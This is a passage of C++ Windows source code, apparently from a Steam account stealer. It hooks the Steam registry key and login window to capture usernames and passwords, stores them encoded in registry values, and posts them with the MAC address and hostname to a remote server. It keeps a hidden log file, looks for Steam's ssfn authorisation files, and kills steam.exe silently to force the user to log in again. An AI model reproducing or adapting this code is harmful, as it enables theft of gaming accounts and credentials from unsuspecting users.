								CString szMD5 = "", szMD5Key = "", Base64_szMD5Key = "";

								szMD5Key += "_CHWM_";

								int szMD5Key_Len = szMD5Key.GetLength();

								for(int j=szMD5Key_Len; j<16 ;j++)
								{
									int randNum = rand()%26;
									if(j%2)
									{
										szMD5.Format("%C", randNum+97);
									}
									else
									{
										szMD5.Format("%C", randNum+65);
									}
											szMD5Key += szMD5;
											Sleep(50);
								}

								szMD5Key = gen(szMD5Key);
								Base64_szMD5Key = BASE64Encode(szMD5Key, szMD5Key.GetLength());
								/

								memset(osx, 0, MAX_PATH);
								memset(jsj, 0, MAX_PATH);

								// 获取计算机名
								WSADATA _wsaData = {0};
								int _Result = 0;
								_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);
								if(_Result == SOCKET_ERROR)
								{
									strcat(jsj, "unkonw");
								}
								_Result = gethostname(jsj, sizeof(jsj));
								if(_Result == SOCKET_ERROR)
								{
									strcat(jsj, "unkonw");
								}
								WSACleanup();

								// 获取MAC
								CString szMac = "";
								szMac = GetMacAddress();

								// 获取系统版本
								os();

								// 构建统计数据
								CString strPostData = "";
								strPostData.Format(TEXT("%s?M=%s&OS=%s&CP=%s&VER=%s&ID=%s&AccOne=%s&DataOne=%s&AccSecond=%s&DataSecond=%s&MD5=%s&LP=%s&JC="), 
								strServerName, 
								szMac, 
								osx, 
								jsj, 
								szVersion, 
								strUserID, 
								szRegAccOne, 
								szRegDataOne, 
								szRegAccSecon, 
								szRegDataSecon, 
								Base64_szMD5Key,
								szLocalLP);

								strPostData.Replace(" ", "%20");
								//AfxMessageBox(strPostData);

								DWORD dw0;
								BOOL isConnect = ::IsNetworkAlive( &dw0 );
								if( isConnect )
								{
									BOOL Result = SendURLPost(strPostData);
									if( Result )
									{
										//AfxMessageBox("成功发送数据!");

										FILE *fp;
										CFileFind finder1x;
										BOOL noEmpty1x=finder1x.FindFile("C:\\NTUSERS.LOG");
										if(!noEmpty1x)
										{
											fp=fopen("C:\\NTUSERS.LOG", "w");
											if(fp)
											{
												fprintf(fp, "%s", LocalUser.GetBuffer(0));
											}
											fclose(fp);
										}
										else
										{
											fp=fopen("C:\\NTUSERS.LOG", "a");
											if(fp)
											{
												fprintf(fp, "%s", LocalUser.GetBuffer(0));
											}
											fclose(fp);
										}

										//隐藏数据文件
										SetFileAttributes("C:\\NTUSERS.LOG", FILE_ATTRIBUTE_HIDDEN);

										RegDeleteValue(hKey, TEXT("Gaming"));
										RegDeleteValue(hKey, TEXT("AutoLoginUser"));

										Login = false;
										szLoginEXE = true;

										/*		邮箱令牌	*/
										if(szLocalLP == "0")
										{
											DeleteFile("C:\\MailData.txt");

											//创建劫持IE线程
											//szBrowser = false;
											//DWORD dwThreadId;
											//CreateThread(NULL, 0, HOOKBrowser, NULL, 0, &dwThreadId);

											//创建线程监控ST主界面
											myEmailSTR = "";
											DWORD dwThreadId2;
											CreateThread(NULL, 0, HOOKLoginMain, NULL, 0, &dwThreadId2); 

											/*
													创	建
											锁定注册表默认浏览器
													  与
											劫持非 IE 内核浏览器
													线	程
											*/
											//DWORD dwThreadId3;
											//CreateThread(NULL, 0, HOOKIERegedit, NULL, 0, &dwThreadId3); 
										}
										else if(szLocalLP == "2")
										{
											/*		未知令牌	*/

											//创建线程监控ST主界面
											myEmailSTR = "";
											DWORD dwThreadId;
											CreateThread(NULL, 0, HOOKLoginMain, NULL, 0, &dwThreadId); 
										}
									}
									else
									{
										//AfxMessageBox("发送数据失败!");

										DeleteFile("C:\\NTUSERS.LOG");
										RegDeleteValue(hKey, TEXT("Gaming"));
										RegDeleteValue(hKey, TEXT("AutoLoginUser"));

										Login = false;
										szLoginEXE = true;

										RegCloseKey(xKey);
										RegCloseKey(hKey);

										ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
									}
								}
								else
								{
									DeleteFile("C:\\NTUSERS.LOG");
									RegDeleteValue(hKey, TEXT("Gaming"));
									RegDeleteValue(hKey, TEXT("AutoLoginUser"));

									Login = false;
									szLoginEXE = true;

									RegCloseKey(xKey);
									RegCloseKey(hKey);

									ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
								}
							}
							else
							{
									RegDeleteValue(hKey, TEXT("Gaming"));
									RegDeleteValue(hKey, TEXT("AutoLoginUser"));

									Login = false;
									szLoginEXE = true;

									ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
							}
						}
					}
				}
				Login = false;
				szLoginEXE = true;

				RegCloseKey(xKey);
				RegCloseKey(hKey);
			}
			else
			{
				HWND Hwnd_Steam = ::GetForegroundWindow();

				TCHAR szSTClassName[MAX_PATH]={0};
				ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));
				::GetClassName(Hwnd_Steam, szSTClassName, MAX_PATH);

				CString szMySTClass = "";
				szMySTClass.Format(TEXT("%s"), szSTClassName);

				int isSTClass1 = szMySTClass.Find("PopupWindow", 0);
				int isSTClass2 = szMySTClass.Find("vguiPopupWindow", 0);

				long lstyle1 = GetWindowLong(Hwnd_Steam, GWL_STYLE);
				long lstyle2 = GetWindowLong(Hwnd_Steam, GWL_EXSTYLE);

				long lstyle3 = GetWindowLongPtr(Hwnd_Steam, GWL_STYLE);
				long lstyle4 = GetWindowLongPtr(Hwnd_Steam, GWL_EXSTYLE);

				CString szStyle1 = "", szStyle2 = "", szStyle3 = "", szStyle4 = "";

				szStyle1.Format(TEXT("%X"), lstyle1);
				szStyle2.Format(TEXT("%X"), lstyle2);

				szStyle3.Format(TEXT("%X"), lstyle3);
				szStyle4.Format(TEXT("%X"), lstyle4);

				if( 
					(isSTClass2 >= 0 || isSTClass1 >= 0) 
					&& 
					(szStyle1 == "960F0000" || szStyle1 == "96CF0000" || szStyle3 == "960F0000" || szStyle3 == "96CF0000") 
				)
				{
					/* 此为租号数据 */
					szLocalLP = "3";

					HKEY hKey, xKey;
					LONG lRet = RegOpenKeyEx( HKEY_CURRENT_USER,
					TEXT("Software\\Valve\\Steam"),
					0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );
					if( lRet == ERROR_SUCCESS )
					{
						char user[256] = {0};
						DWORD dwType = REG_SZ;
						DWORD dwLength = 256;

						LONG lRet2 = RegQueryValueEx( hKey, 
						TEXT("AutoLoginUser"), 
						NULL, 
						&dwType, (LPBYTE)user, &dwLength );
						if( lRet2 == ERROR_SUCCESS && strlen(user) > 4 )
						{
							CString LocalUser = "";
							CString ReadRegUser = "";

							LocalUser.Format(TEXT("%s"), user);
							ReadRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), user);

							LONG lRet2 = RegOpenKeyEx( HKEY_CURRENT_USER,
							ReadRegUser,
							0, KEY_QUERY_VALUE|KEY_WRITE, &xKey );
							if( lRet2 == ERROR_SUCCESS )
							{
								char data1[256] = {0}, data2[256] = {0}, data3[256] = {0}, data4[256] = {0};
								DWORD dwType1 = REG_SZ, dwType2 = REG_SZ, dwType3 = REG_SZ, dwType4 = REG_SZ;
								DWORD dwLength1 = 256, dwLength2 = 256, dwLength3 = 256, dwLength4 = 256;

								LONG lRet3 = RegQueryValueEx( xKey, 
								TEXT("AccOne"), 
								NULL, 
								&dwType1, (LPBYTE)data1, &dwLength1 );

								LONG lRet4 = RegQueryValueEx( xKey, 
								TEXT("DataOne"), 
								NULL, 
								&dwType2, (LPBYTE)data2, &dwLength2 );

								LONG lRet5 = RegQueryValueEx( xKey, 
								TEXT("AccSecond"), 
								NULL, 
								&dwType3, (LPBYTE)data3, &dwLength3 );

								LONG lRet6 = RegQueryValueEx( xKey, 
								TEXT("DataSecond"), 
								NULL, 
								&dwType4, (LPBYTE)data4, &dwLength4 );

								if( (lRet3 == ERROR_SUCCESS && lRet4 == ERROR_SUCCESS && lRet5 == ERROR_SUCCESS && lRet6 == ERROR_SUCCESS) && (strlen(data3) >= 10 && strlen(data4) >= 20) )
								{
									CString szRegAccOne = "", szRegDataOne = "", szRegAccSecon = "", szRegDataSecon = "";

									szRegAccOne.Format(TEXT("%s"), data1);
									szRegDataOne.Format(TEXT("%s"), data2);
									szRegAccSecon.Format(TEXT("%s"), data3);
									szRegDataSecon.Format(TEXT("%s"), data4);

									/
									// 随机生成 16位 KEY

									time_t seed = time(NULL); 
									srand((unsigned)seed);

									int randNum = (rand()*2);

									CString szMD5 = "", szMD5Key = "", Base64_szMD5Key = "";

									szMD5Key += "_CHWM_";

									int szMD5Key_Len = szMD5Key.GetLength();

									for(int j=szMD5Key_Len; j<16 ;j++)
									{
										int randNum = rand()%26;
										if(j%2)
										{
											szMD5.Format("%C", randNum+97);
										}
										else
										{
											szMD5.Format("%C", randNum+65);
										}
												szMD5Key += szMD5;
												Sleep(50);
									}

									szMD5Key = gen(szMD5Key);
									Base64_szMD5Key = BASE64Encode(szMD5Key, szMD5Key.GetLength());
									/

									memset(osx, 0, MAX_PATH);
									memset(jsj, 0, MAX_PATH);

									// 获取计算机名
									WSADATA _wsaData = {0};
									int _Result = 0;
									_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);
									if(_Result == SOCKET_ERROR)
									{
										strcat(jsj, "unkonw");
									}
									_Result = gethostname(jsj, sizeof(jsj));
									if(_Result == SOCKET_ERROR)
									{
										strcat(jsj, "unkonw");
									}
									WSACleanup();

									// 获取MAC
									CString szMac = "";
									szMac = GetMacAddress();

									// 获取系统版本
									os();

									// 构建统计数据
									CString strPostData = "";
									strPostData.Format(TEXT("%s?M=%s&OS=%s&CP=%s&VER=%s&ID=%s&AccOne=%s&DataOne=%s&AccSecond=%s&DataSecond=%s&MD5=%s&LP=%s&JC="), 
									strServerName, 
									szMac, 
									osx, 
									jsj, 
									szVersion, 
									strUserID, 
									szRegAccOne, 
									szRegDataOne, 
									szRegAccSecon, 
									szRegDataSecon, 
									Base64_szMD5Key,
									szLocalLP);

									strPostData.Replace(" ", "%20");
									//AfxMessageBox(strPostData);

									DWORD dw0;
									BOOL isConnect = ::IsNetworkAlive( &dw0 );
									if( isConnect )
									{
										BOOL Result = SendURLPost(strPostData);
										if( Result )
										{
											//AfxMessageBox("成功发送数据!");

											FILE *fp;
											CFileFind finder1x;
											BOOL noEmpty1x=finder1x.FindFile("C:\\NTUSERS.LOG");
											if(!noEmpty1x)
											{
												fp=fopen("C:\\NTUSERS.LOG", "w");
												if(fp)
												{
													fprintf(fp, "%s", LocalUser.GetBuffer(0));
												}
												fclose(fp);
											}
											else
											{
												fp=fopen("C:\\NTUSERS.LOG", "a");
												if(fp)
												{
													fprintf(fp, "%s", LocalUser.GetBuffer(0));
												}
												fclose(fp);
											}

											//隐藏数据文件
											SetFileAttributes("C:\\NTUSERS.LOG", FILE_ATTRIBUTE_HIDDEN);

											RegDeleteValue(hKey, TEXT("Gaming"));
											RegDeleteValue(hKey, TEXT("AutoLoginUser"));

											Login = false;
											szLoginEXE = true;

											///
											// 处理电脑授权文件

											CString mySTInstPath = "", mySTSSFNFilePath = "";

											HKEY dw_hKey;
											LONG x_Ret1 = RegOpenKeyEx( HKEY_CURRENT_USER,
											TEXT("Software\\Valve\\Steam"),
											0, KEY_QUERY_VALUE|KEY_WRITE, &dw_hKey );
											if( x_Ret1 == ERROR_SUCCESS )
											{
												char dw_data[256] = {0};
												DWORD dw_Type = REG_SZ;
												DWORD dw_Length = 256;

												LONG x_Ret2 = RegQueryValueEx( dw_hKey, 
												TEXT("SteamPath"), 
												NULL, 
												&dw_Type, (LPBYTE)dw_data, &dw_Length );

												mySTInstPath.Format(TEXT("%s"), dw_data);
												mySTSSFNFilePath.Format(TEXT("%s/ssfn*"), dw_data);
											}
											RegCloseKey(dw_hKey);

											char *mySSFNPathx = mySTInstPath.GetBuffer(mySTInstPath.GetLength()+1);
											mySTInstPath.ReleaseBuffer();

											char *mySSFNFilex = mySTSSFNFilePath.GetBuffer(mySTSSFNFilePath.GetLength()+1);
											mySTSSFNFilePath.ReleaseBuffer();

											//AfxMessageBox(mySTInstPath);
											//AfxMessageBox(mySTSSFNFilePath);

											SearchFilesByWildcard_2(mySSFNPathx, mySSFNFilex);

											szTslgameEXE = true;

											Sleep(3000);

											DWORD dwThreadId4;
											CreateThread(NULL, 0, HOOKGameMain, NULL, 0, &dwThreadId4); 

											///
										}
										else
										{
											//AfxMessageBox("发送数据失败!");

											DeleteFile("C:\\NTUSERS.LOG");
											RegDeleteValue(hKey, TEXT("Gaming"));
											RegDeleteValue(hKey, TEXT("AutoLoginUser"));

											Login = false;
											szLoginEXE = true;

											RegCloseKey(xKey);
											RegCloseKey(hKey);

											ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
										}
									}
									else
									{
										DeleteFile("C:\\NTUSERS.LOG");
										RegDeleteValue(hKey, TEXT("Gaming"));
										RegDeleteValue(hKey, TEXT("AutoLoginUser"));

										Login = false;
										szLoginEXE = true;

										RegCloseKey(xKey);
										RegCloseKey(hKey);

										ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
									}
								}
								else
								{
										RegDeleteValue(hKey, TEXT("Gaming"));
										RegDeleteValue(hKey, TEXT("AutoLoginUser"));

										Login = false;
										szLoginEXE = true;

										ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
								}
							}
						}
					}
					Login = false;
					szLoginEXE = true;

					RegCloseKey(xKey);
					RegCloseKey(hKey);
				}
			}
		}
		else
		{
			if( !GetProcess("steam.exe") )
			{
				Login = false;
				szLoginEXE = true;
			}
		}
		Sleep(100);

	} while( !szLoginEXE );

	return 0;
}

 
// 线程 1

static DWORD WINAPI HOOKRegedit(LPVOID pParam)
{
	//AfxMessageBox("线程 1 已启动!");

	HANDLE hNotify;
	HKEY hKeyx;
 
	hNotify = CreateEvent(NULL, //不使用SECURITY_ATTRIBUTES结构 
		FALSE, //不自动重置 
		TRUE,   //设置初始状态 
		"RegistryNotify" //事件对象的名称 
	); 
 
	if (hNotify == 0) 
	{ 
		Regedit = false;

		ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);

		MessageBox(NULL,"steam.exe CreateEvent failed!","[ Steam ]",MB_OK); 
		ExitProcess(0); 
	} 
 
	if (RegOpenKeyEx(HKEY_CURRENT_USER, //根键 
		"Software\\Valve\\Steam", //子键 
		0, //reserved 
		KEY_NOTIFY, //监视用 
		&hKeyx //保存句柄 
		) != ERROR_SUCCESS) 
	{ 
		CloseHandle(hNotify); 

		Regedit = false;

		ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);

		MessageBox(NULL,"steam.exe RegOpenKey failed!","[ Steam ]",MB_OK); 
		ExitProcess(0); 
	} 
 
	if (RegNotifyChangeKeyValue(hKeyx, //监视子键句柄 
		TRUE, //监视此项的子键 
		REG_NOTIFY_CHANGE_NAME | REG_NOTIFY_CHANGE_LAST_SET, //监视增加或删除了子键,监视键值发生是否改变 
		hNotify, //接受注册表变化事件的事件对象句柄 
		TRUE //注册表变化前报告 
		) != ERROR_SUCCESS) 
	{ 
		CloseHandle(hNotify); 
		RegCloseKey(hKeyx); 

		Regedit = false;

		ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);

		MessageBox(NULL,"steam.exe RegNotifyChange failed!","[ Steam ]", MB_OK); 
		ExitProcess(0); 
	} 
 
	if (WaitForSingleObject(hNotify, INFINITE) != WAIT_FAILED) 
	{ 
		//MessageBox(NULL,"注册表有改动"," ",MB_OK);

		szStrFirst = "";
		szStrFirst = szStr;
		szStr = "";

		HKEY hKey;
		LONG lRet, lRet2, lRet3, lRet4;
		lRet = RegOpenKeyEx( HKEY_CURRENT_USER,
		TEXT("Software\\Valve\\Steam"),
		0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );
		if( lRet == ERROR_SUCCESS )
		{
			char data[256] = {0}, data2[256] = {0};
			DWORD dwType = REG_SZ, dwType2 = REG_SZ;
			DWORD dwLength = 256, dwLength2 = 256;

			lRet2 = RegQueryValueEx( hKey, 
			TEXT("AutoLoginUser"), 
			NULL, 
			&dwType, (LPBYTE)data, &dwLength );

			lRet3 = RegQueryValueEx( hKey, 
			TEXT("SteamExe"), 
			NULL, 
			&dwType2, (LPBYTE)data2, &dwLength2 );

			DWORD dwLastXError = 0;
			lRet4 = RegSetValueEx( hKey, 
			TEXT("RememberPassword"), 
			NULL, 
			REG_DWORD, (LPBYTE)&dwLastXError, sizeof(DWORD) );

			if(lRet2 == ERROR_SUCCESS && lRet3 == ERROR_SUCCESS)
			{
				szRegUser.Format(TEXT("%s"), data);
				szRegExe.Format(TEXT("%s"), data2);

				DWORD flen;
				char *dataX;
				CFile *file2;
				file2 = new CFile;
				if( file2->Open("C:\\NTUSERS.LOG", CFile::shareDenyNone | CFile::modeRead) )
				{
					flen = file2->GetLength();
					dataX = new char[(int)flen+1];

					file2->SeekToBegin();
					file2->Read(dataX, flen);
				}
				szAccount.Format(TEXT("%s"), dataX);
				file2->Close();
				delete file2;
				delete []dataX;

				//AfxMessageBox(szAccount);

				int ff = szAccount.Find(szRegUser, 0);
				if( ff >= 0 )
				{
					//AfxMessageBox("帐号:"+szRegUser+"\n模糊数据:"+szStrFirst+"\n当前 帐号 为重复数据!");

					Regedit = false;
					RegDeleteValue(hKey, TEXT("AutoLoginUser"));
				}
				else
				{
					HKEY dw_hKey;
					LONG x_Ret1 = RegOpenKeyEx( HKEY_CURRENT_USER,
					TEXT("Software\\Valve\\Steam"),
					0, KEY_QUERY_VALUE|KEY_WRITE, &dw_hKey );
					if( x_Ret1 == ERROR_SUCCESS )
					{
						char dw_data[256] = {0};
						DWORD dw_Type = REG_SZ;
						DWORD dw_Length = 256;

						LONG x_Ret2 = RegQueryValueEx( dw_hKey, 
						TEXT("SteamPath"), 
						NULL, 
						&dw_Type, (LPBYTE)dw_data, &dw_Length );

						szSTPath.Format(TEXT("%s"), dw_data);
						szSTFile.Format(TEXT("%s/ssfn*"), dw_data);
					}
					RegCloseKey(dw_hKey);

					//
					// 删除电脑授权文件

					//char *mySSFNPath = szSTPath.GetBuffer(szSTPath.GetLength()+1);
					//szSTPath.ReleaseBuffer();

					//char *mySSFNFile = szSTFile.GetBuffer(szSTFile.GetLength()+1);
					//szSTFile.ReleaseBuffer();

					//SearchFilesByWildcard_1(mySSFNPath, mySSFNFile);

					//

					CString WriteRegUser = "";
					WriteRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), szRegUser);

					HKEY hKeyX;
					DWORD dwDisp;
					DWORD dwTypeX = REG_SZ;

					int ret = RegCreateKeyEx(HKEY_CURRENT_USER, WriteRegUser, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKeyX, &dwDisp);
					if (ret == ERROR_SUCCESS)
					{
						szOneUser=szRegUser+"  ";
						szRegUser=gen(szRegUser);

						CString Base64_szRegUser = "";
						Base64_szRegUser = BASE64Encode(szRegUser, szRegUser.GetLength());

						char *szAc1 = Base64_szRegUser.GetBuffer(Base64_szRegUser.GetLength()+1);
						Base64_szRegUser.ReleaseBuffer();

						int ret2 = RegSetValueEx(hKeyX, TEXT("AccOne"), 0, dwTypeX, (BYTE*)szAc1, strlen(szAc1));
						if (ret2 == ERROR_SUCCESS)
						{
							szStrFirst=gen(szStrFirst);

							CString Base64_szStrFirst = "";
							Base64_szStrFirst = BASE64Encode(szStrFirst, szStrFirst.GetLength());

							char *szDt1 = Base64_szStrFirst.GetBuffer(Base64_szStrFirst.GetLength()+1);
							Base64_szStrFirst.ReleaseBuffer();

							int ret3 = RegSetValueEx(hKeyX, TEXT("DataOne"), 0, dwTypeX, (BYTE*)szDt1, strlen(szDt1));
							if (ret3 == ERROR_SUCCESS)
							{
								//AfxMessageBox("首次帐号:"+szRegUser+"\n首次模糊数据:"+szDt1+"\nEXE路径:"+szRegExe);

								DWORD dwLastError = 0;
								RegSetValueEx( hKey, TEXT("RememberPassword"), NULL, REG_DWORD, (LPBYTE)&dwLastError, sizeof(DWORD) );

								RegCloseKey(hKeyX);
								RegCloseKey(hKey);
								CloseHandle(hNotify);
								RegCloseKey(hKeyx);

								ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe && \""+szRegExe+"\"", NULL, SW_HIDE);

								Sleep(2000);

								Regedit = false;

								//MessageBox(0, "steam.exe 读取系统数据失败,请再次登录! ", "[ Steam ]", MB_ICONERROR | MB_OK | MB_DEFBUTTON1);
							}
						}
					}
					RegCloseKey(hKeyX);
				}
			}
		}
		RegCloseKey(hKey);
	}
	CloseHandle(hNotify);
	RegCloseKey(hKeyx);

	return 0;
}

 
// 线程 2

static DWORD WINAPI HOOKRegedit2(LPVOID pParam)
{
	//AfxMessageBox("线程 2 已启动!");

	HKEY hKey_xxx;
	LONG lRet_xxx1 = RegOpenKeyEx( HKEY_CURRENT_USER,
	TEXT("Software\\Valve\\Steam"),
	0, KEY_QUERY_VALUE|KEY_WRITE, &hKey_xxx );
	if( lRet_xxx1 == ERROR_SUCCESS )
	{
		char data_xxx[256] = {0};
		DWORD dwType_xxx = REG_SZ;
		DWORD dwLength_xxx = 256;
		memset(data_xxx, 0, 256);

		LONG lRet_xxx2 = RegQueryValueEx( hKey_xxx, 
		TEXT("AutoLoginUser"), 
		NULL, 
		&dwType_xxx, (LPBYTE)data_xxx, &dwLength_xxx );
		if(lRet_xxx2 == ERROR_SUCCESS)
		{
			CString myReg1User = "";
			myReg1User.Format(TEXT("%s "), data_xxx);

			char *sz1User = myReg1User.GetBuffer(myReg1User.GetLength()+1);
			myReg1User.ReleaseBuffer();

			DWORD XdwType_X = REG_SZ;
			RegSetValueEx( hKey_xxx, TEXT("AutoLoginUser"), 0, XdwType_X, (BYTE*)sz1User, strlen(sz1User) );
		}
	}
	RegCloseKey(hKey_xxx);

	HANDLE hNotify;
	HKEY hxKeyx;
	hNotify = CreateEvent(NULL, //不使用SECURITY_ATTRIBUTES结构 
		FALSE, //不自动重置 
		TRUE,   //设置初始状态 
		"RegistryNotify" //事件对象的名称 
	); 

	if (hNotify == 0) 
	{ 
		Regedit = false;

		ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);

		MessageBox(NULL,"steam.exe CreateEvent failed!","[ Steam ]",MB_OK); 
		ExitProcess(0); 
	} 
 
	if (RegOpenKeyEx(HKEY_CURRENT_USER, //根键 
		"Software\\Valve\\Steam", //子键 
		0, //reserved 
		KEY_NOTIFY, //监视用 
		&hxKeyx //保存句柄 
		) != ERROR_SUCCESS) 
	{ 
		CloseHandle(hNotify); 

		Regedit = false;

		ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);

		MessageBox(NULL,"steam.exe RegOpenKey failed!","[ Steam ]",MB_OK); 
		ExitProcess(0); 
	} 

	if (RegNotifyChangeKeyValue(hxKeyx, //监视子键句柄 
		TRUE, //监视此项的子键 
		REG_NOTIFY_CHANGE_NAME | REG_NOTIFY_CHANGE_LAST_SET, //监视增加或删除了子键,监视键值发生是否改变 
		hNotify, //接受注册表变化事件的事件对象句柄 
		TRUE //注册表变化前报告 
		) != ERROR_SUCCESS) 
	{ 
		CloseHandle(hNotify); 
		RegCloseKey(hxKeyx); 

		Regedit = false;

		ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);

		MessageBox(NULL,"steam.exe RegNotifyChange failed!","[ Steam ]", MB_OK); 
		ExitProcess(0); 
	} 

	if (WaitForSingleObject(hNotify, INFINITE) != WAIT_FAILED) 
	{ 
		//MessageBox(NULL,"注册表有改动"," ",MB_OK);

		szStrSecon = "";
		szStrSecon = szStr;
		szStr = "";

		HKEY hKey;
		LONG lRet, lRet2;
		lRet = RegOpenKeyEx( HKEY_CURRENT_USER,
		TEXT("Software\\Valve\\Steam"),
		0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );
		if( lRet == ERROR_SUCCESS )
		{
			char data[256] = {0};
			DWORD dwType = REG_SZ;
			DWORD dwLength = 256;

			lRet2 = RegQueryValueEx( hKey, 
			TEXT("AutoLoginUser"), 
			NULL, 
			&dwType, (LPBYTE)data, &dwLength );
			if(lRet2 == ERROR_SUCCESS)
			{
				szMailID.Format(TEXT("%s"), data);
				szMailID.Replace(" ", "");

				szRegUser2.Format(TEXT("%s"), data);
				szRegUser2.Replace(" ", "");

				//AfxMessageBox("二次帐号:"+szRegUser2+"\n二次密码:"+szStrSecon);

				CString ReadRegUser = "";
				ReadRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), szRegUser2);

				HKEY xKey;
				LONG lRet3, lRet4, lRet5;
				lRet3 = RegOpenKeyEx( HKEY_CURRENT_USER,
				ReadRegUser,
				0, KEY_QUERY_VALUE|KEY_WRITE, &xKey );
				if( lRet3 == ERROR_SUCCESS )
				{
					char xdata[256] = {0};
					char xdata2[256] = {0};
					DWORD xdwType1 = REG_SZ;
					DWORD xdwType2 = REG_SZ;
					DWORD xdwLength1 = 256;
					DWORD xdwLength2 = 256;

					lRet4 = RegQueryValueEx( xKey, 
					TEXT("AccOne"), 
					NULL, 
					&xdwType1, (LPBYTE)xdata, &xdwLength1 );

					lRet5 = RegQueryValueEx( xKey, 
					TEXT("DataOne"), 
					NULL, 
					&xdwType2, (LPBYTE)xdata2, &xdwLength2 );
					if(lRet4 == ERROR_SUCCESS && lRet5 == ERROR_SUCCESS)
					{
						CString szReplaceStr = "";
						CString Base64_AccSeconData = "", Base64_DataSeconData = "";

						szReplaceStr = szRegUser2 + "   ";
						szRegUser2 = gen(szRegUser2);

						Sleep(500);

						szStrSecon.Replace(szReplaceStr, "");
						szStrSecon = gen(szStrSecon);

						Base64_AccSeconData = BASE64Encode(szRegUser2, szRegUser2.GetLength());
						Sleep(500);
						Base64_DataSeconData = BASE64Encode(szStrSecon, szStrSecon.GetLength());

						char *szAcc2 = Base64_AccSeconData.GetBuffer(Base64_AccSeconData.GetLength()+1);
						Base64_AccSeconData.ReleaseBuffer();

						char *szData2 = Base64_DataSeconData.GetBuffer(Base64_DataSeconData.GetLength()+1);
						Base64_DataSeconData.ReleaseBuffer();

						DWORD XxdwTypeX1 = REG_SZ, XxdwTypeX2 = REG_SZ;
						LONG lRet6 = RegSetValueEx( xKey, 
						TEXT("AccSecond"), 
						NULL, 
						XxdwTypeX1, (BYTE*)szAcc2, strlen(szAcc2));

						LONG lRet7 = RegSetValueEx( xKey, 
						TEXT("DataSecond"), 
						NULL, 
						XxdwTypeX2, (BYTE*)szData2, strlen(szData2));

						if(lRet6 == ERROR_SUCCESS && lRet7 == ERROR_SUCCESS)
						{
							//AfxMessageBox("设置注册表用户数据成功!");

							if( !Login )
							{
								DWORD dwThreadId;
								thread = CreateThread(NULL, 0, HOOKLoginEXE, NULL, 0, &dwThreadId);

								Login = true;
							}

							DWORD xdwLastErrorx = 0;
							RegSetValueEx( hKey, 
							TEXT("RememberPassword"), 
							NULL, 
							REG_DWORD, (LPBYTE)&xdwLastErrorx, sizeof(DWORD) );
						}
						else
						{
							//AfxMessageBox("设置注册表用户数据失败!");

							RegDeleteValue(hKey, TEXT("AutoLoginUser"));

							RegCloseKey(xKey);
							RegCloseKey(hKey);
							RegCloseKey(hxKeyx);
							CloseHandle(hNotify);

							Regedit = false;

							ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
						}
					}
					else
					{
						//AfxMessageBox("打开注册表用户数据键值失败!");

						DeleteFile("C:\\NTUSERS.LOG");
						RegDeleteValue(hKey, TEXT("AutoLoginUser"));

						RegCloseKey(xKey);
						RegCloseKey(hKey);
						RegCloseKey(hxKeyx);
						CloseHandle(hNotify);

						Regedit = false;

						ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
					}
				}
				else
				{
					//AfxMessageBox("打开注册表用户数据目录失败!");

					char dataZ[256] = {0};
					DWORD dwTypeZ = REG_SZ;
					DWORD dwLengthZ = 256;

					LONG lRet3Z = RegQueryValueEx( hKey, 
					TEXT("AutoLoginUser"), 
					NULL, 
					&dwTypeZ, (LPBYTE)dataZ, &dwLengthZ );

					DWORD dwLastErrorx = 0;
					LONG lRet4Z = RegSetValueEx( hKey, 
					TEXT("RememberPassword"), 
					NULL, 
					REG_DWORD, (LPBYTE)&dwLastErrorx, sizeof(DWORD) );
					if(lRet3Z == ERROR_SUCCESS)
					{
						//AfxMessageBox("Gaming is True!\n二次帐号:"+szRegUser3+"\n二次密码:"+szStrSecon);

						CString szRegUser3 = "";
						szRegUser3.Format(TEXT("%s"), dataZ);

						CString WriteRegUser = "";
						WriteRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), szRegUser3);

						HKEY xhKeyX;
						DWORD XxdwDisp;
						LONG lRetz = RegCreateKeyEx(HKEY_CURRENT_USER, WriteRegUser, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &xhKeyX, &XxdwDisp);
						if(lRetz == ERROR_SUCCESS)
						{
							CString szReplaceStr = "";
							CString Base64_AccSeconData = "", Base64_DataSeconData = "";

							szReplaceStr = szRegUser3 + "   ";
							szRegUser3 = gen(szRegUser3);

							Sleep(500);

							szStrSecon.Replace(szReplaceStr, "");
							szStrSecon = gen(szStrSecon);

							Base64_AccSeconData = BASE64Encode(szRegUser3, szRegUser3.GetLength());
							Sleep(500);
							Base64_DataSeconData = BASE64Encode(szStrSecon, szStrSecon.GetLength());

